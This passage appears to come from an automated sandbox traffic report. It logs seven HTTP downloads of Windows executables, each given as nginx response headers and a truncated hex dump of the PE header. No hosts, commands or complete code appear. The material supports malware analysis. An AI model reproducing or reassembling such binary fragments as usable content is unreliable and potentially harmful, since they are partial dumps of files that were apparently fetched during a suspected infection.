00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:56 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:57 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:57 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:57 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:58 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:56:05 GMTContent-Type: application/octet-streamContent-Length: 328232Last-Modified: Wed, 28 Aug 2024 19:58:57 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66cf8181-50228"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 56 81 cf 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d4 04 00 00 06 00 00 00 00 00 00 5e f2 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 b7 52 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 f2 04 00 53 00 00 00 00 00 05 00 42 02 00 00 00 00 00 00 00 00 00 00 00 dc 04 00 28 26 00 00 00 20 05 00 0c 00 00 00 d0 f0 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d2 04 00 00 20 00 00 00 d4 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 00 05 00 00 04 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f2 04 00 00 00 00 00 48 00 00 00 02 00 05 00 98 e0 04 00 38 10 00 00 03 00 02 00 0f 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 7e 30 aa dd a7 42 95 cb 06 7e 16 66 63 df d6 a0 d8 12 38 7f e2 e9 9d 75 90 20 b8 08 26 b0 72 e1 93 c7 f4 8f 83 9b ac 8e 4b f5 22 59 60 5f 15 96 a3 a6 42 77 90 ef c5 6f 13 ea 52 a9 58 63 d2 60 d5 dd df 0c 0d a2 1f 28 6f 9c 85 6e a6 8e e0 fc b9 45 35 4c 60 73 b3 c3 8d 42 cf 26 f7 33 b8 6a 6d de fc 63 20 91 ed cd be 31 90 9c ff 58 e3 7a 96 6b 48 f4 6d 19 fd 4a 5b 5f 73 4e 91 f3 4f 8b cc a9 c0 16 08 57 c4 08 a6 0b bc bd 12 2f d1 8e 95 4d f3 33 9d b3 65 0c 7a 3a af d6 ba af ab 37 49 c5 79 1f 37 a8 4c 81 39 f6 f4 6f 20 c0 31 e0 19 f9 c3 3b 25 eb 01 b8 6e 7a 34 da ea 95 57 6c 45 6e 23 a5 37 4e bb 01 f0 f4 0b ea 3a 76 c0 ff 8a a5 4d 1a 19 f1 49 96 b2 04 43 b1 fd a2 88 6b bb 9d fe 7d f2 b7 c1 66 38 5c 78 ba 71 2b 5f e1 77 df 75 21 e9 81 94 62 5a 00 95 78 0b 42 b0 38 79 a1 2d 8c cd 5d 43 97 1b 34 95 a4 d1 35 0e 80 6b 9e 81 83 32 83 f7 2d db 35 50 f3 b3 b0 df db 89 f7 4e 9a 21 9b 57 25 fd f7 c8 06 6d 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:56:06 GMTContent-Type: application/octet-streamContent-Length: 196136Last-Modified: Wed, 28 Aug 2024 19:09:07 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66cf75d3-2fe28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 75 cf 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d0 02 00 00 06 00 00 00 00 00 00 5e ee 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 ad 77 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 ee 02 00 53 00 00 00 00 00 03 00 42 02 00 00 00 00 00 00 00 00 00 00 00 d8 02 00 28 26 00 00 00 20 03 00 0c 00 00 00 d0 ec 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 ce 02 00 00 20 00 00 00 d0 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 00 03 00 00 04 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 d6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ee 02 00 00 00 00 00 48 00 00 00 02 00 05 00 98 dc 02 00 38 10 00 00 03 00 02 00 0f 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 44 d3 a5 67 31 84 4d 3c 80 8f 5a 66 48 41 ec 5d b4 52 28 f8 87 bd a7 fe c7 d7 8f 76 ac 0c 58 37 0b 55 22 d0 37 b7 8b 2d 4f 2c 93 1d 3f 76 31 a8 83 b0 7a 11 8f a4 d2 3f 14 6c 97 0a 3e c8 b7 5e d7 10 27 10 50 4c 5e 1c 8a 6c 53 ae 0a 47 c6 63 f5 7d a5 af 50 e0 89 16 0e 80 38 b7 91 9e 6f 53 fe d6 4d de ae 16 c9 ac 5b 97 d0 bb 86 09 2d 13 1a 66 66 94 b2 63 66 bb 0b 95 48 12 c9 e7 6a c4 c7 88 c9 25 18 6e a5 92 c3 dd 1e 61 2f 3f 72 1a 52 e9 be 22 c4 19 13 ca d5 12 a0 bd fb 5d 5a 92 d4 f7 a5 6a 53 96 f1 ef 6b c3 57 ba 61 39 39 e1 d3 11 94 7c 0e 70 79 95 f8 6d c1 73 7c 81 68 85 c5 b9 ac 97 0a e6 c2 34 15 cf f0 58 37 04 a7 b6 b5 32 8d ed 